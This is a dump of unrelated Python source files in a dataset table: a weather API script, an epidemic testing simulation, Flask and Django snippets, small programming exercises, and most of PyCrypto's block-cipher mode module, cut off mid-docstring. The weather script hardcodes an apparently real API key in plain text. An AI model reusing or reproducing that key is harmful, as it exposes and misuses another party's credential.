text stringlengths 38 1.54M |
|---|
#!/bin/python
#getting weather of major cities around the world using OpenWeather API
import requests
import json
#API key from OpenWeather map
api_key = "26c7d541b9d4a453df49d961bf746589"
#base url from OpenWeathermap
base_url = "http://api.openweathermap.org/data/2.5/weather?"
city = input("Please enter your favourite city :")
complete_url = base_url + "appid=" +api_key + "&q" +city
#use requests to get the data
response = requests.get(complete_url)
#print(response)
data = response.json() # converting the response into json data format
print(data['main'])
|
def check_test_type(var, tests):
if var != None:
assert type(var) == str, 'not a string'
assert var in tests.keys(), 'unknown test type {}'.format(var)
return var
class Testing():
def __init__(self, model, diagnostic_test_type,
preventive_screening_test_type, follow_up_testing_interval,
screening_intervals, liberating_testing,
K1_contact_types, verbosity):
self.follow_up_testing_interval = follow_up_testing_interval
self.screening_intervals = screening_intervals
self.liberating_testing = liberating_testing
self.model = model
self.verbosity = verbosity
self.K1_contact_types = K1_contact_types
# mean parameters for exposure and infection duration to base
# estimates for test detection thresholds on
exposure_duration = 5
infection_duration = 11
self.tests = {
'same_day_antigen':
{
'sensitivity':1,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':0
},
'same_day_antigen0.1':
{
'sensitivity':0.1,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':0
},
'same_day_antigen0.2':
{
'sensitivity':0.2,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':0
},
'same_day_antigen0.3':
{
'sensitivity':0.3,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':0
},
'same_day_antigen0.4':
{
'sensitivity':0.4,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':0
},
'same_day_antigen0.5':
{
'sensitivity':0.5,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':0
},
'same_day_antigen0.6':
{
'sensitivity':0.6,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':0
},
'same_day_antigen0.7':
{
'sensitivity':0.7,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':0
},
'same_day_antigen0.8':
{
'sensitivity':0.8,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':0
},
'same_day_antigen0.9':
{
'sensitivity':0.9,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':0
},
'one_day_antigen':
{
'sensitivity':1,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':1
},
'two_day_antigen':
{
'sensitivity':1,
'specificity':1,
'time_until_testable':exposure_duration + 2,
'time_testable':exposure_duration + 6,
'time_until_test_result':2
},
'same_day_PCR':
{
'sensitivity':1,
'specificity':1,
'time_until_testable':exposure_duration - 1,
'time_testable':infection_duration,
'time_until_test_result':0
},
'one_day_PCR':
{
'sensitivity':1,
'specificity':1,
'time_until_testable':exposure_duration - 1,
'time_testable':infection_duration,
'time_until_test_result':1
},
'two_day_PCR':
{
'sensitivity':1,
'specificity':1,
'time_until_testable':exposure_duration - 1,
'time_testable':infection_duration,
'time_until_test_result':2
},
'same_day_LAMP':
{
'sensitivity':1,
'specificity':1,
'time_until_testable':exposure_duration,
'time_testable':infection_duration,
'time_until_test_result':0
},
'one_day_LAMP':
{
'sensitivity':1,
'specificity':1,
'time_until_testable':exposure_duration,
'time_testable':infection_duration,
'time_until_test_result':1
},
'two_day_LAMP':
{
'sensitivity':1,
'specificity':1,
'time_until_testable':exposure_duration,
'time_testable':infection_duration,
'time_until_test_result':2
}
}
self.diagnostic_test_type = check_test_type(diagnostic_test_type, self.tests)
self.preventive_screening_test_type = check_test_type(preventive_screening_test_type, self.tests)
#self.sensitivity = self.tests[self.test_type]['sensitivity']
#self.specificity = self.tests[self.test_type]['specificity']
#self.time_until_testable = self.tests[self.test_type]['time_until_testable']
#self.time_testable = self.tests[self.test_type]['time_testable']
#self.time_until_test_result = self.tests[self.test_type]['time_until_test_result']
|
import os
from flask import Flask, render_template, redirect, url_for, session
from datetime import datetime
from flask import Flask, render_template, request
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
# import for mails
# python linting now enable
# admin mai
from View.configuration import config
app = Flask(__name__)
app.config['SECRET_KEY'] = config.secret_key # one by o
app.config.update( # bulk mai init karne ka
SQLALCHEMY_DATABASE_URI=config.database_uri,
SQLALCHEMY_TRACK_MODIFICATIONS=False,
MAIL_SERVER=config.Mail_SERVER
)
# mail - Hard code and it is security problem - clicnt ko selll ..
app.config['MAIL_PORT'] = config.MAIL_PORT # config
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USERNAME'] = os.environ["MAIL_USERNAME"]
# enter your email her
app.config['MAIL_DEFAULT_SENDER'] = os.environ["MAIL_USERNAME"]
app.config['MAIL_PASSWORD'] = os.environ["MAIL_PASSWORD"]
# initialize the database connection
db = SQLAlchemy(app)
migrate = Migrate(app, db)
db.create_all()
db.session.commit()
import router
from router import common
from router import contact
|
from app1.models import *
from app1.util.utils import *
def retriveTeachPlan(request):
'''
URL:
http://127.0.0.1:8000/app4/retriveTeachPlan?tpno=001
'''
try:
tpno=request.GET.get("tpno")
result=TeachPlan.objects.values().get(tpno=tpno)
response={}
response['msg']='Success!'
response['err_num']=0
response['data']=result
return JsonResponse(response,safe=False)
except Exception as e:
response={}
response['msg']=str(e)
response['err_num']=1
return showJsonerror(response) |
#coding:utf-8
class Solution(object):
def myPow(self, x, n):
if n == 0:
return 1
if n < 0:
return 1.0 / self.myPow(x, -n)
v = self.myPow(x, n / 2)
if n % 2 == 1:
return x * v * v
else:
return v * v
|
#номер элемента ряда Фибоначчи
# 1 1 2 3 5 8 13 21
# def fibo(n):
# if n <= 2:
# return 1
# return fibo(n - 2) + fibo(n - 1)
#
#
# print(fibo(1))
# print(fibo(2))
# print(fibo(3))
# print(fibo(4))
# print(fibo(5))
# print(fibo(6))
# print(fibo(7))
# print(fibo(8))
# 5! = 5 * 4 * 3 * 2 * 1
def fact(num):
if num == 1:
return 1
return num * fact(num - 1)
#вызовы идут в глубину до базового случая, затем цепочка
#сврачивается наверх, возвращая значения
|
"""Scrapes powerschool to return grades and info about specific classes
Usage:
power-scraper <classes> <grades> [--name|--room|--teacher|--teacher-email] [-h]
"""
__version__ = "0.0.1" |
# -*- coding:utf-8 -*-
from .models import Brand,Serie,Version,Car
def cars_url(self):
return [{
'title': u'汽车管理', 'perm': self.get_model_perm(Brand, 'view'),
'icon':'fa fa-cloud',
'menus':(
{
'title': u'品牌',
'url': self.get_model_url(Brand, 'changelist'),
'perm': self.get_model_perm(Brand, 'view'),
},
{
'title': u'型号',
'url': self.get_model_url(Serie, 'changelist'),
'perm': self.get_model_perm(Serie, 'view'),
},
{
'title': u'版本',
'url': self.get_model_url(Version, 'changelist'),
'perm': self.get_model_perm(Version, 'view'),
},
{
'title': u'汽车',
'url': self.get_model_url(Car, 'changelist'),
'perm': self.get_model_perm(Car, 'view'),
},
)
},] |
class Caneta:
def __init__(self,cor,marca,numero_ponta,volume_tinta):
self.cor = cor
self.marca = marca
self.numero_ponta = numero_ponta
self.volume_tinta = volume_tinta
def encher_caneta(self):
self.volume_tinta = 50
def escrever(self,palavra):
print(palavra)
self.volume_tinta-=1
def retornar_marca(self):
return self.marca
def imprimir_caracteristica(self):
print(f"{self.cor},{self.marca},{self.numero_ponta},{self.volume_tinta}")
c1 = Caneta("Azul","bic",0.5,50)
c1.escrever("A melhor maneira de prever o futuro é inventá-lo")
c1.imprimir_caracteristica()
|
class MySingleton:
# Here will be the instance stored.
__instance = None
@staticmethod
def getInstance():
""" Static access method. """
if MySingleton.__instance == None:
MySingleton()
return MySingleton.__instance
def __init__(self, val1, val2):
""" Virtually private constructor. """
if MySingleton.__instance != None:
raise Exception("This class is a MySingleton!")
else:
MySingleton.__instance = self
MySingleton.val1 = val1
MySingleton.val2 = val2 |
# -*- coding: utf-8 -*-
#
# Cipher/blockalgo.py
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Module with definitions common to all block ciphers."""
import sys
if sys.version_info[0] == 2 and sys.version_info[1] == 1:
from Crypto.Util.py21compat import *
from Crypto.Util.py3compat import *
from binascii import unhexlify
from Crypto.Util import Counter
from Crypto.Util.strxor import strxor
from Crypto.Util.number import long_to_bytes, bytes_to_long
import Crypto.Util.Counter
from Crypto.Hash import CMAC
from Crypto.Hash.CMAC import _SmoothMAC
from Crypto.Protocol.KDF import _S2V
from Crypto.Util import galois
#: *Electronic Code Book (ECB)*.
#: This is the simplest encryption mode. Each of the plaintext blocks
#: is directly encrypted into a ciphertext block, independently of
#: any other block. This mode exposes frequency of symbols
#: in your plaintext. Other modes (e.g. *CBC*) should be used instead.
#:
#: See `NIST SP800-38A`_ , Section 6.1 .
#:
#: .. _`NIST SP800-38A` : http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
MODE_ECB = 1
#: *Cipher-Block Chaining (CBC)*. Each of the ciphertext blocks depends
#: on the current and all previous plaintext blocks. An Initialization Vector
#: (*IV*) is required.
#:
#: The *IV* is a data block to be transmitted to the receiver.
#: The *IV* can be made public, but it must be authenticated by the receiver
#: and it should be picked randomly.
#:
#: See `NIST SP800-38A`_ , Section 6.2 .
#:
#: .. _`NIST SP800-38A` : http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
MODE_CBC = 2
#: *Cipher FeedBack (CFB)*. This mode is similar to CBC, but it transforms
#: the underlying block cipher into a stream cipher. Plaintext and ciphertext
#: are processed in *segments* of **s** bits. The mode is therefore sometimes
#: labelled **s**-bit CFB. An Initialization Vector (*IV*) is required.
#:
#: When encrypting, each ciphertext segment contributes to the encryption of
#: the next plaintext segment.
#:
#: This *IV* is a data block to be transmitted to the receiver.
#: The *IV* can be made public, but it should be picked randomly.
#: Reusing the same *IV* for encryptions done with the same key lead to
#: catastrophic cryptographic failures.
#:
#: See `NIST SP800-38A`_ , Section 6.3 .
#:
#: .. _`NIST SP800-38A` : http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
MODE_CFB = 3
#: This mode should not be used.
MODE_PGP = 4
#: *Output FeedBack (OFB)*. This mode is very similar to CBC, but it
#: transforms the underlying block cipher into a stream cipher.
#: The keystream is the iterated block encryption of an
#: Initialization Vector (*IV*).
#:
#: The *IV* is a data block to be transmitted to the receiver.
#: The *IV* can be made public, but it should be picked randomly.
#:
#: Reusing the same *IV* for encryptions done with the same key lead to
#: catastrophic cryptograhic failures.
#:
#: See `NIST SP800-38A`_ , Section 6.4 .
#:
#: .. _`NIST SP800-38A` : http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
MODE_OFB = 5
#: *CounTeR (CTR)*. This mode is very similar to ECB, in that
#: encryption of one block is done independently of all other blocks.
#: Unlike ECB, the block *position* contributes to the encryption and no
#: information leaks about symbol frequency.
#:
#: Each message block is associated to a *counter* which must be unique
#: across all messages that get encrypted with the same key (not just within
#: the same message). The counter is as big as the block size.
#:
#: Counters can be generated in several ways. The most straightword one is
#: to choose an *initial counter block* (which can be made public, similarly
#: to the *IV* for the other modes) and increment its lowest **m** bits by
#: one (modulo *2^m*) for each block. In most cases, **m** is chosen to be half
#: the block size.
#:
#: Reusing the same *initial counter block* for encryptions done with the same
#: key lead to catastrophic cryptograhic failures.
#:
#: See `NIST SP800-38A`_ , Section 6.5 (for the mode) and Appendix B (for how
#: to manage the *initial counter block*).
#:
#: .. _`NIST SP800-38A` : http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
MODE_CTR = 6
#: *OpenPGP CFB*. This mode is a variant of CFB, and it is only used in PGP and
#: OpenPGP_ applications. An Initialization Vector (*IV*) is required.
#:
#: Unlike CFB, the IV is not transmitted to the receiver.
#: Instead, the *encrypted* IV is.
#: The IV is a random data block. Two of its bytes are duplicated to act
#: as a checksum for the correctness of the key. The encrypted IV is
#: therefore 2 bytes longer than the clean IV.
#:
#: .. _OpenPGP: http://tools.ietf.org/html/rfc4880
MODE_OPENPGP = 7
#: *Counter with CBC-MAC (CCM)*. This is an Authenticated Encryption with
#: Associated Data (`AEAD`_) mode. It provides both confidentiality and
#: authenticity.
#: The header of the message may be left in the clear, if needed, and it will
#: still be subject to authentication. The decryption step tells the receiver
#: if the message comes from a source that really knowns the secret key.
#: Additionally, decryption detects if any part of the message - including the
#: header - has been modified or corrupted.
#:
#: This mode requires a nonce. The nonce shall never repeat for two
#: different messages encrypted with the same key, but it does not need
#: to be random.
#: Note that there is a trade-off between the size of the nonce and the
#: maximum size of a single message you can encrypt.
#:
#: It is important to use a large nonce if the key is reused across several
#: messages and the nonce is chosen randomly.
#:
#: It is acceptable to us a short nonce if the key is only used a few times or
#: if the nonce is taken from a counter.
#:
#: The following table shows the trade-off when the nonce is chosen at
#: random. The column on the left shows how many messages it takes
#: for the keystream to repeat **on average**. In practice, you will want to
#: stop using the key way before that.
#:
#: +--------------------+---------------+-------------------+
#: | Avg. # of messages | nonce | Max. message |
#: | before keystream | size | size |
#: | repeats | (bytes) | (bytes) |
#: +====================+===============+===================+
#: | 2**52 | 13 | 64K |
#: +--------------------+---------------+-------------------+
#: | 2**48 | 12 | 16M |
#: +--------------------+---------------+-------------------+
#: | 2**44 | 11 | 4G |
#: +--------------------+---------------+-------------------+
#: | 2**40 | 10 | 1T |
#: +--------------------+---------------+-------------------+
#: | 2**36 | 9 | 64P |
#: +--------------------+---------------+-------------------+
#: | 2**32 | 8 | 16E |
#: +--------------------+---------------+-------------------+
#:
#: This mode is only available for ciphers that operate on 128 bits blocks
#: (e.g. AES but not TDES).
#:
#: See `NIST SP800-38C`_ or RFC3610_ .
#:
#: .. _`NIST SP800-38C`: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
#: .. _RFC3610: https://tools.ietf.org/html/rfc3610
#: .. _AEAD: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
MODE_CCM = 8
#: *EAX*. This is an Authenticated Encryption with Associated Data
#: (`AEAD`_) mode. It provides both confidentiality and authenticity.
#:
#: The header of the message may be left in the clear, if needed, and it will
#: still be subject to authentication.
#:
#: The decryption step tells the receiver if the message comes from a source
#: that really knowns the secret key.
#: Additionally, decryption detects if any part of the message - including the
#: header - has been modified or corrupted.
#:
#: This mode requires a nonce. The nonce shall never repeat for two
#: different messages encrypted with the same key, but it does not need to
#: be random.
#
#: This mode is only available for ciphers that operate on 64 or
#: 128 bits blocks.
#:
#: There are no official standards defining EAX. The implementation is based on
#: `a proposal`__ that was presented to NIST.
#:
#: .. _AEAD: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
#: .. __: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
MODE_EAX = 9
#: *Synthetic Initialization Vector*. This is an Authenticated Encryption with
#: Associated Data (`AEAD`_) mode. It provides both confidentiality and
#: authenticity.
#: The header of the message may be left in the clear, if needed, and it will
#: still be subject to authentication. The decryption step tells the receiver
#: if the message comes from a source that really knowns the secret key.
#: Additionally, decryption detects if any part of the message - including the
#: header - has been modified or corrupted.
#:
#: If the data being encrypted is completely unpredictable to an adversary
#: (e.g. a secret key, for key wrapping purposes) a nonce is not strictly
#: required.
#:
#: Otherwise, a nonce has to be provided; the nonce shall never repeat
#: for two different messages encrypted with the same key, but it does not
#: need to be random.
#:
#: Unlike other AEAD modes such as CCM, EAX or GCM, accidental reuse of a
#: nonce is not catastrophic for the confidentiality of the message. The only
#: effect is that an attacker can tell when the same plaintext (and same
#: associated data) is protected with the same key.
#:
#: The length of the MAC is fixed to the block size of the underlying cipher.
#: The key size is twice the length of the key of the underlying cipher.
#:
#: This mode is only available for AES ciphers.
#:
#: +--------------------+---------------+-------------------+
#: | Cipher | SIV MAC size | SIV key length |
#: | | (bytes) | (bytes) |
#: +====================+===============+===================+
#: | AES-128 | 16 | 32 |
#: +--------------------+---------------+-------------------+
#: | AES-192 | 16 | 48 |
#: +--------------------+---------------+-------------------+
#: | AES-256 | 16 | 64 |
#: +--------------------+---------------+-------------------+
#:
#: See `RFC5297`_ and the `original paper`__.
#:
#: .. _RFC5297: https://tools.ietf.org/html/rfc5297
#: .. _AEAD: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
#: .. __: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
MODE_SIV = 10
#: *Galois/Counter Mode (GCM)*. This is an Authenticated Encryption with
#: Associated Data (`AEAD`_) mode. It provides both confidentiality and
#: authenticity.
#: The header of the message may be left in the clear, if needed, and it will
#: still be subject to authentication. The decryption step tells the receiver
#: if the message comes from a source that really knowns the secret key.
#: Additionally, decryption detects if any part of the message - including the
#: header - has been modified or corrupted.
#:
#: This mode requires a nonce. The nonce shall never repeat for two
#: different messages encrypted with the same key, but it does not need to
#: be random.
#:
#: This mode is only available for ciphers that operate on 128 bits blocks
#: (e.g. AES but not TDES).
#:
#: See `NIST SP800-38D`_ .
#:
#: .. _`NIST SP800-38D`: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
#: .. _AEAD: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
MODE_GCM = 11
def _getParameter(name, index, args, kwargs, default=None):
"""Find a parameter in tuple and dictionary arguments a function receives"""
param = kwargs.get(name)
if len(args) > index:
if param:
raise TypeError("Parameter '%s' is specified twice" % name)
param = args[index]
return param or default
class _CBCMAC(_SmoothMAC):
def __init__(self, key, ciphermod):
_SmoothMAC.__init__(self, ciphermod.block_size, None, 0)
self._key = key
self._factory = ciphermod
def _ignite(self, data):
if self._mac:
raise TypeError("_ignite() cannot be called twice")
self._buffer.insert(0, data)
self._buffer_len += len(data)
self._mac = self._factory.new(self._key, MODE_CBC, bchr(0) * 16)
self.update(b(""))
def _update(self, block_data):
self._t = self._mac.encrypt(block_data)[-16:]
def _digest(self, left_data):
return self._t
class _GHASH(_SmoothMAC):
"""GHASH function defined in NIST SP 800-38D, Algorithm 2.
If X_1, X_2, .. X_m are the blocks of input data, the function
computes:
X_1*H^{m} + X_2*H^{m-1} + ... + X_m*H
in the Galois field GF(2^256) using the reducing polynomial
(x^128 + x^7 + x^2 + x + 1).
"""
def __init__(self, hash_subkey, block_size, table_size='64K'):
_SmoothMAC.__init__(self, block_size, None, 0)
if table_size == '64K':
self._hash_subkey = galois._ghash_expand(hash_subkey)
else:
self._hash_subkey = hash_subkey
self._last_y = bchr(0) * 16
self._mac = galois._ghash
def copy(self):
clone = _GHASH(self._hash_subkey, self._bs, table_size='0K')
_SmoothMAC._deep_copy(self, clone)
clone._last_y = self._last_y
return clone
def _update(self, block_data):
self._last_y = galois._ghash(block_data, self._last_y,
self._hash_subkey)
def _digest(self, left_data):
return self._last_y
class BlockAlgo:
"""Class modelling an abstract block cipher."""
def __init__(self, factory, key, *args, **kwargs):
self.mode = _getParameter('mode', 0, args, kwargs, default=MODE_ECB)
self.block_size = factory.block_size
self._factory = factory
self._tag = None
if self.mode == MODE_CCM:
if self.block_size != 16:
raise TypeError("CCM mode is only available for ciphers that operate on 128 bits blocks")
self._mac_len = kwargs.get('mac_len', 16) # t
if self._mac_len not in (4, 6, 8, 10, 12, 14, 16):
raise ValueError("Parameter 'mac_len' must be even and in the range 4..16")
self.nonce = _getParameter('nonce', 1, args, kwargs) # N
if not (self.nonce and 7 <= len(self.nonce) <= 13):
raise ValueError("Length of parameter 'nonce' must be"
" in the range 7..13 bytes")
self._key = key
self._msg_len = kwargs.get('msg_len', None) # p
self._assoc_len = kwargs.get('assoc_len', None) # a
self._cipherMAC = _CBCMAC(key, factory)
self._done_assoc_data = False # True when all associated data
# has been processed
# Allowed transitions after initialization
self._next = [self.update, self.encrypt, self.decrypt,
self.digest, self.verify]
# Try to start CCM
self._start_ccm()
elif self.mode == MODE_OPENPGP:
self._start_PGP(factory, key, *args, **kwargs)
elif self.mode == MODE_EAX:
self._start_eax(factory, key, *args, **kwargs)
elif self.mode == MODE_SIV:
self._start_siv(factory, key, *args, **kwargs)
elif self.mode == MODE_GCM:
self._start_gcm(factory, key, *args, **kwargs)
else:
self._cipher = factory.new(key, *args, **kwargs)
self.IV = self._cipher.IV
def _start_gcm(self, factory, key, *args, **kwargs):
if self.block_size != 16:
raise TypeError("GCM mode is only available for ciphers that operate on 128 bits blocks")
self.nonce = _getParameter('nonce', 1, args, kwargs)
if not self.nonce:
raise TypeError("MODE_GCM requires a nonce")
self._mac_len = kwargs.get('mac_len', 16)
if not (self._mac_len and 4 <= self._mac_len <= 16):
raise ValueError("Parameter 'mac_len' must not be larger than 16 bytes")
# Allowed transitions after initialization
self._next = [self.update, self.encrypt, self.decrypt,
self.digest, self.verify]
self._done_assoc_data = False
# Length of the ciphertext or plaintext
self._msg_len = 0
# Step 1 in SP800-38D, Algorithm 4 (encryption) - Compute H
# See also Algorithm 5 (decryption)
hash_subkey = factory.new(key).encrypt(bchr(0) * 16)
# Step 2 - Compute J0 (integer, not byte string!)
if len(self.nonce) == 12:
self._j0 = bytes_to_long(self.nonce + b("\x00\x00\x00\x01"))
else:
fill = (16 - (len(self.nonce) % 16)) % 16 + 8
ghash_in = (self.nonce +
bchr(0) * fill +
long_to_bytes(8 * len(self.nonce), 8))
mac = _GHASH(hash_subkey, factory.block_size, '0K')
mac.update(ghash_in)
self._j0 = bytes_to_long(mac.digest())
# Step 3 - Prepare GCTR cipher for encryption/decryption
ctr = Counter.new(128, initial_value=self._j0 + 1,
allow_wraparound=True)
self._cipher = self._factory.new(key, MODE_CTR, counter=ctr)
# Step 5 - Bootstrat GHASH
self._cipherMAC = _GHASH(hash_subkey, factory.block_size, '64K')
# Step 6 - Prepare GCTR cipher for GMAC
ctr = Counter.new(128, initial_value=self._j0, allow_wraparound=True)
self._tag_cipher = self._factory.new(key, MODE_CTR, counter=ctr)
def _start_siv(self, factory, key, *args, **kwargs):
subkey_size, rem = divmod(len(key), 2)
if rem:
raise ValueError("MODE_SIV requires a key twice as long as for the underlying cipher")
# IV is optional
self.nonce = _getParameter('nonce', 1, args, kwargs)
self._cipherMAC = _S2V(key[:subkey_size], ciphermod=factory)
self._subkey_ctr = key[subkey_size:]
self._mac_len = factory.block_size
self._cipherMAC = self._cipherMAC
# Allowed transitions after initialization
self._next = [self.update, self.encrypt, self.decrypt,
self.digest, self.verify]
def _siv_ctr_cipher(self, tag):
"""Create a new CTR cipher from the MAC in SIV mode"""
tag_int = bytes_to_long(tag)
init_counter = tag_int ^ (tag_int & 0x8000000080000000)
ctr = Counter.new(self._factory.block_size * 8,
initial_value=init_counter,
allow_wraparound=True)
return self._factory.new(self._subkey_ctr, MODE_CTR, counter=ctr)
def _start_eax(self, factory, key, *args, **kwargs):
self.nonce = _getParameter('nonce', 1, args, kwargs)
if not self.nonce:
raise TypeError("MODE_EAX requires a nonce")
# Allowed transitions after initialization
self._next = [self.update, self.encrypt, self.decrypt,
self.digest, self.verify]
self._mac_len = kwargs.get('mac_len', self.block_size)
if not (self._mac_len and 4 <= self._mac_len <= self.block_size):
raise ValueError("Parameter 'mac_len' must not be larger than %d"
% self.block_size)
self._omac = [
CMAC.new(key, bchr(0) * (self.block_size - 1) + bchr(i),
ciphermod=factory)
for i in range(0, 3)
]
# Compute MAC of nonce
self._omac[0].update(self.nonce)
self._cipherMAC = self._omac[1]
# MAC of the nonce is also the initial counter for CTR encryption
counter_int = bytes_to_long(self._omac[0].digest())
counter_obj = Crypto.Util.Counter.new(
self.block_size * 8,
initial_value=counter_int,
allow_wraparound=True)
self._cipher = factory.new(key, MODE_CTR, counter=counter_obj)
def _start_PGP(self, factory, key, *args, **kwargs):
# OPENPGP mode. For details, see 13.9 in RCC4880.
#
# A few members are specifically created for this mode:
# - _encrypted_iv, set in this constructor
# - _done_first_block, set to True after the first encryption
# - _done_last_block, set to True after a partial block is processed
self._done_first_block = False
self._done_last_block = False
self.IV = _getParameter('IV', 1, args, kwargs)
if self.IV is None:
# TODO: Decide whether 'IV' or 'iv' should be used going forward,
# and deprecate the other. 'IV' is consistent with the rest of
# PyCrypto, but 'iv' is more common in Python generally. For now,
# we'll support both here. When in doubt, use a positional
# parameter for now.
self.IV = _getParameter('iv', 1, args, kwargs)
if not self.IV:
raise ValueError("MODE_OPENPGP requires an IV")
# Instantiate a temporary cipher to process the IV
IV_cipher = factory.new(
key,
MODE_CFB,
b('\x00') * self.block_size, # IV for CFB
segment_size=self.block_size * 8)
# The cipher will be used for...
if len(self.IV) == self.block_size:
# ... encryption
self._encrypted_IV = IV_cipher.encrypt(
self.IV + self.IV[-2:] + # Plaintext
b('\x00') * (self.block_size - 2) # Padding
)[:self.block_size + 2]
elif len(self.IV) == self.block_size + 2:
# ... decryption
self._encrypted_IV = self.IV
self.IV = IV_cipher.decrypt(
self.IV + # Ciphertext
b('\x00') * (self.block_size - 2) # Padding
)[:self.block_size + 2]
if self.IV[-2:] != self.IV[-4:-2]:
raise ValueError("Failed integrity check for OPENPGP IV")
self.IV = self.IV[:-2]
else:
raise ValueError("Length of IV must be %d or %d bytes for MODE_OPENPGP"
% (self.block_size, self.block_size+2))
# Instantiate the cipher for the real PGP data
self._cipher = factory.new(
key,
MODE_CFB,
self._encrypted_IV[-self.block_size:],
segment_size=self.block_size * 8
)
def _start_ccm(self, assoc_len=None, msg_len=None):
# CCM mode. This method creates the 2 ciphers used for the MAC
# (self._cipherMAC) and for the encryption/decryption (self._cipher).
#
# Member _assoc_buffer may already contain user data that needs to be
# authenticated.
if self._cipherMAC.can_reduce():
# Already started
return
if assoc_len is not None:
self._assoc_len = assoc_len
if msg_len is not None:
self._msg_len = msg_len
if None in (self._assoc_len, self._msg_len):
return
# q is the length of Q, the encoding of the message length
q = 15 - len(self.nonce)
## Compute B_0
flags = (
64 * (self._assoc_len > 0) +
8 * divmod(self._mac_len - 2, 2)[0] +
(q - 1)
)
b_0 = bchr(flags) + self.nonce + long_to_bytes(self._msg_len, q)
# Start CBC MAC with zero IV
assoc_len_encoded = b('')
if self._assoc_len > 0:
if self._assoc_len < (2 ** 16 - 2 ** 8):
enc_size = 2
elif self._assoc_len < (2 ** 32):
assoc_len_encoded = b('\xFF\xFE')
enc_size = 4
else:
assoc_len_encoded = b('\xFF\xFF')
enc_size = 8
assoc_len_encoded += long_to_bytes(self._assoc_len, enc_size)
self._cipherMAC._ignite(b_0 + assoc_len_encoded)
# Start CTR cipher
prefix = bchr(q - 1) + self.nonce
ctr = Counter.new(128 - len(prefix) * 8, prefix, initial_value=0)
self._cipher = self._factory.new(self._key, MODE_CTR, counter=ctr)
# Will XOR against CBC MAC
self._s_0 = self._cipher.encrypt(bchr(0) * 16)
def update(self, assoc_data):
"""Protect associated data
When using an AEAD mode like CCM, EAX, GCM or SIV, and
if there is any associated data, the caller has to invoke
this function one or more times, before using
``decrypt`` or ``encrypt``.
By *associated data* it is meant any data (e.g. packet headers) that
will not be encrypted and will be transmitted in the clear.
However, the receiver is still able to detect any modification to it.
In CCM and GCM, the *associated data* is also called
*additional authenticated data* (AAD).
In EAX, the *associated data* is called *header*.
If there is no associated data, this method must not be called.
The caller may split associated data in segments of any size, and
invoke this method multiple times, each time with the next segment.
:Parameters:
assoc_data : byte string
A piece of associated data. There are no restrictions on its size.
"""
if self.mode not in (MODE_CCM, MODE_EAX, MODE_SIV, MODE_GCM):
raise TypeError("update() not supported by this mode of operation")
if self.update not in self._next:
raise TypeError("update() can only be called immediately after initialization")
self._next = [self.update, self.encrypt, self.decrypt,
self.digest, self.verify]
return self._cipherMAC.update(assoc_data)
def encrypt(self, plaintext):
"""Encrypt data with the key and the parameters set at initialization.
A cipher object is stateful: once you have encrypted a message
you cannot encrypt (or decrypt) another message using the same
object.
For `MODE_SIV` (always) and `MODE_CCM` (when ``msg_len`` was not
passed at initialization), this method can be called only **once**.
For all other modes, the data to encrypt can be broken up in two or
more pieces and `encrypt` can be called multiple times.
That is, the statement:
>>> c.encrypt(a) + c.encrypt(b)
is equivalent to:
>>> c.encrypt(a+b)
That also means that you cannot reuse an object for encrypting
or decrypting other data with the same key.
This function does not add any padding to the plaintext.
- For `MODE_ECB` and `MODE_CBC`, *plaintext* length (in bytes) must be
a multiple of *block_size*.
- For `MODE_CFB`, *plaintext* length (in bytes) must be a multiple
of *segment_size*/8.
- For `MODE_OFB`, `MODE_CTR` and all AEAD modes
*plaintext* can be of any length.
- For `MODE_OPENPGP`, *plaintext* must be a multiple of *block_size*,
unless it is the last chunk of the message.
:Parameters:
plaintext : byte string
The piece of data to encrypt.
